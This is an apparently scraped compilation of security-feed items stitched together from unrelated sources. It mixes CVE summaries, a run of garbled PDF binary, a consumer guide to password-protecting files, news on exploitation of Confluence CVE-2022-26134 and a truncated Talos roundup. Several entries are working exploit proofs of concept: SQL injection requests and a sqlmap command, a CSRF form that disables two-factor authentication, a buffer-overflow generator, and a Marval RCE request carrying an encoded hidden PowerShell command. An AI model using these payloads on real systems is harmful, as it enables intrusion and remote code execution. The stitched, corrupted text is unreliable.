An issue was discovered in TitanFTP (aka Titan FTP) NextGen before 1.2.1050. When installing, Microsoft SQL Express 2019 installs by default with an SQL instance running as SYSTEM with BUILTIN\Users as sysadmin, thus enabling unprivileged Windows users to execute commands locally as NT AUTHORITY\SYSTEM, aka NX-I674 (sub-issue 2).

%PDF-1.4 %���� 3 0 obj <> stream ����JFIFxx��ZExifMM\*JQQtQs������C��C��@�"�� ���}!1AQa"q2���#B��R��$3br� %&'()\*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� ���w!1AQaq"2�B���� #3R�br� $4�%�&'()\*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?�1���o?�G����<{��7���

CVE-2022-34006

Virtua Software Cobranca version 12S suffers from a remote SQL injection vulnerability.

    # Exploit Title: Virtua Software Cobranca 12S - SQLi# Shodan Query: http.favicon.hash:876876147# Date: 13/08/2021# Exploit Author: Luca Regne# Vendor Homepage: https://www.virtuasoftware.com.br/# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe# Version: 12S# Tested on: Windows Server 2019# CVE : CVE-2021-37589------------------------------------------------------------------------## Description A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter. ## Request PoC```POST /controller/login.php?acao=autenticar HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 37Connection: closeCookie: origem_selecionado=; PHPSESSID=idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario```This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error. ```POST /controller/login.php?acao=autenticar HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 37Connection: closeCookie: origem_selecionado=; PHPSESSID=idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario```## ExploitSave the request from burp to file ```bashpython3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent```

Virtua Software Cobranca 12S SQL Injection

Marval MSM version 14.19.0.12476 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)# Date: 27/5/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.marvalnorthamerica.com/# Software Link: https://www.marvalnorthamerica.com/# Version: v14.19.0.12476# Tested on: Windows# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY# 2FA Bypass:<html>  <body>    <form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain">      <input type="submit" value="Submit request" />    </form>  </body></html>

Marval MSM 14.19.0.12476 Cross Site Request Forgery

Kitty version 0.76.0.8 suffers from a buffer overflow vulnerability.

    # Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow# Discovered by: Yehia Elghaly# Discovered Date: 2022-06-08# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe# Tested Version: 0.76.0.8# Vulnerability Type: Buffer Overflow# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64# Description: Kitty 0.76.0.8 Stack Buffer Overflow# Steps to reproduce:# 1. - Run the python script and it will create exploit.txt file.# 3. - Kitty 0.76.0.8# 4. - Sessions -> Save# 5. - Paste the characters of txt to Saved/Sessions then click save# 6. - Crashed# Note: ECX Overwwrite #!/usr/bin/pythonexploit = 'A' * 2091try:     file = open("exploit.txt","w")    file.write(exploit)    file.close()    print("POC is created")except:    print("POC not created")

Kitty 0.76.0.8 Stack Buffer Overflow

Marval MSM version 14.19.0.12476 suffers from a remote code execution vulnerability.

    # Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)# Date: 27/5/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.marvalnorthamerica.com/# Software Link: https://www.marvalnorthamerica.com/# Version: v14.19.0.12476# Tested on: Windows# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rcePOST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2Host: MSMHandler.ioCookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 456Origin: https://MSMHandler.ioDnt: 1Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstype=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true

Marval MSM 14.19.0.12476 Remote Code Execution

Put a digital lock on your most important data.

You never know when one of your files might reach someone it wasn't intended to reach—perhaps through an email forward, a USB stick left behind on a desk, or maybe even an unauthorized user accessing your computer.

Should that happen, password protection is all that stands between your data and the people whom you don't want to see it. It's an extra layer of security you can add to your most sensitive files without too much trouble.

How you go about this will depend on the software you're using to create the file in the first place. Some applications have password protection features built in, while in other cases you'll need to lock up your files using a different method.

Microsoft Word, Excel, and PowerPoint

Adding a password to a document in Word.

Microsoft Word via David Nield

In Word, Excel, or PowerPoint for Windows, open the file you want to protect with a password, then select **File** and **Info**. You should see a Protect option at the top of the next list: Click this button, choose **Encrypt with Password**, and type out your password.

Passwords can be up to 15 characters long and are case-sensitive, so double-check what you're typing in. If you forget the password for a document, spreadsheet, or presentation, you won't be able to get back into it—you'll have to start again from scratch.

If you're using Office on macOS, the process is slightly different: Open the **Review** tab in the ribbon menu at the top, then click the **Protect** button to enter a password. (The button will be labeled slightly differently depending on which program you're in.)

Google Docs, Sheets, and Slides

Sharing a document in Google Docs.

Google Docs via David Nield

There's no password protection feature as such in Google Drive, because your files are already protected by a password: The password linked to your Google account that you use to log in and view your documents, spreadsheets, and presentations.

If you choose to share a file from Google Docs, Sheets, or Slides—via the big **Share** button in the top-right corner when you're working on something—you can either invite specific users to see it (via their email addresses) or generate a link that anyone can use.

We'd recommend the former option (inviting individual users) for maximum security. This means they'll need to log in with their own Google account password—another layer of password protection—before being able to view the file you've shared.

Apple Pages, Numbers, and Keynote

Setting a password on a document in Apple Pages.

Apple Pages via David Nield

If it's the Apple office applications that you're using, the process of adding a password couldn't be much easier. With the file open in Pages, Numbers, or Keynote, select **File** and then **Set Password** to choose and apply your password.

The same warning applies as it does with Microsoft Office—if you can't remember your password then you're not going to be able to get back into your document, spreadsheet, or presentation (otherwise hackers would be able to get in as well).

Note the **Open with Touch ID** checkbox on the password dialog. This gives you the option of using a Touch ID–enabled keyboard on macOS to open your own protected files, saving you the trouble of typing out a password each time.

Protecting Other Files

Adding password protection to a folder on Dropbox.

Dropbox via David Nield

We can't cover every application out there in terms of password protection, but if you dig around in the programs that you're using you might find that they offer this form of additional security while saving files.

If not, you've still got a few options. Keeping files in cloud storage lockers (like Google Drive) is one option: The act of sharing files on these services usually requires a username and password to log in, so your files are kept safe in that way.

Sometimes there are extra features. In the case of Dropbox, for example, on the folder-sharing pane on the web, you can click **Settings** and then change **Who has access** to **People with password**—so both a unique URL and a password are required for access.

If you need another option, create a password-protected archive containing the file or files that you need to keep safe. 7-Zip is a free tool for Windows that is able to build password-protected archives, for example.

Should your files be on an external hard drive, you can encrypt the entire drive and add a password to guard against unwanted access: In Windows, right-click on the drive in File Explorer and choose **Turn on BitLocker**; on macOS, go through the Disk Utility.

Third-party applications such as VeraCrypt (free for both Windows and macOS) are also able to encrypt drives for you, adding password protection at the same time. It's a sensible choice if you're putting sensitive data on a portable storage device.

How to Password Protect Any File

A recently patched critical security flaw in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.
In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a crypto miner called z0miner

A recently patched critical security flaw in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.

In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a crypto miner called z0miner on victim networks.

The bug (CVE-2022-26134, CVSS score: 9.8), which was patched by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.

Other notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called pwnkit, and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.

"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage," Andrew Brandt, principal security researcher at Sophos, said.

The disclosure overlaps with similar warnings from Microsoft, which revealed last week that "multiple adversaries and nation-state actors, including DEV-0401 and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134."

DEV-0401, described by Microsoft as a "China-based lone wolf turned LockBit 2.0 affiliate," has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon (Log4Shell), Confluence (CVE-2021-26084), and on-premises Exchange servers (ProxyShell).

The development is emblematic of an ongoing trend where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 10 and June 17. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for June 10 to June 17

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via \rdms\admin?page=user\manage_user&id=.

**Rescue Dispatch Management System 1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: \\rdms\\admin?page=user\\manage\_user&id=

Vulnerability location: /cms/rdms/admin/?page=user/manage\_user&id=, id

\[+\] Payload: ip/rdms/admin/?page=user/manage\_user&id=-3%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+

GET /rdms/admin/?page\=user/manage\_user&id\=\-3%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close

CVE-2022-31941: bug_report/SQL-1.md at main · Gsir97/bug_report

Most of the attacks involve the use of automated exploits, security vendor says.

A recently disclosed critical remote code execution (RCE) vulnerability in Atlassian's Confluence Server collaboration platform is now under active attack, in a spate of attacks bent on deploying a variety of malware, including ransomware.  

Researchers from Sophos have observed several attacks over the past two weeks in which attackers used automated exploits against vulnerable Confluence instances running on Windows and Linux servers. In at least two of the Windows-related incidents, adversaries exploited the Atlassian vulnerability to drop Cerber ransomware on the victim networks, the security vendor said in a report Thursday.

Atlassian disclosed the vulnerability in Confluence Server (CVE-2022-26134) over Memorial Day weekend, after researchers from Volexity informed the company about the issue, which they discovered while investigating a breach at a customer location. 

The bug — present in all current versions of Atlassian Confluence Server and Confluence Data Center — basically gives unauthenticated attackers a way to drop a remotely accessible in-memory-only Web shell on systems running a vulnerable version of the collaboration software. In the attack that Volexity investigated, the threat actors then used the Web shell access to drop other malware on the compromised system, which, among other things, gave them persistent backdoor access to it.

The bug stirred some concern because it gave attackers a way to access potentially sensitive project, customer, and other data in Confluence environments. At the time the bug was disclosed, Atlassian did not have a patch for it. However, the company released a fix one a day later, on June 3.

**Ongoing Confluence Attacks**

According to Sophos, while the number of vulnerable Confluence servers has been dwindling since then, attacks continue, making it more important than ever to patch. In most of the attacks that the security vendor observed, threat actors appeared to be using the fileless Web shell to try and spread an existing collection of malware tools more widely. 

The various payloads that Sophos observed include Mirai bot variants, a cryptominer known as z0miner, and pwnkit, a tool for gaining root access on most Linux distributions. Sophos said it also observed attackers exploiting the Atlassian Confluence vulnerability to drop ASP- and PHP-based Web shells on vulnerable systems, likely as a precursor to dropping other malware on them.

Sophos said it also has observed attackers running PowerShell commands and downloading shell code for deploying the post-compromise Cobalt Strike toolkit on Windows servers running a vulnerable version of Confluence. In two incidents, a threat actor tried to deploy Cerber ransomware via the Confluence exploit using an encoded PowerShell command to download and execute the malware. In both incidents, the attackers suggested they had also stolen data from the victims for use as additional leverage for extracting a ransom payment. 

However, there was no evidence that the threat actors had actually exfiltrated any data, Sophos said.

**Double-Extortion Threats**

Double-extortion ransomware attacks like the Cerber incidents have become increasingly common since the Maze ransomware group started the trend back in early 2020. With these attacks, threat actors not only encrypt data, but they also threaten to publicly release the data if their ransom demands are not met.

A recent study of the practice by Rapid7 showed that threat actors trying to coerce victims into paying a ransom most frequently leaked a company’s financial data (63%) first, followed by customer data (48%). However, Rapid7 found variances by industry in the types of data that attackers tend to leak initially. 

For instance, with financial services victims, attackers generally tended to leak customer data first (83% of the time), instead of the victim's internal financial data. However, when it came to organizations in the healthcare and pharmaceutical sectors, ransomware actors leaked the victim's financial data 71% of the time, which was more substantially more frequent than incidents involving leaks of customer data.

Rapid7 also discovered differences among ransomware actors when it comes to the type of data they leaked. For instance, 81% of the incidents involving Conti ransomware featured publicly leaked financial data. The Cl0p group, on the other hand, disclosed employee information (70%) more than any other type of information.

Tag

#windows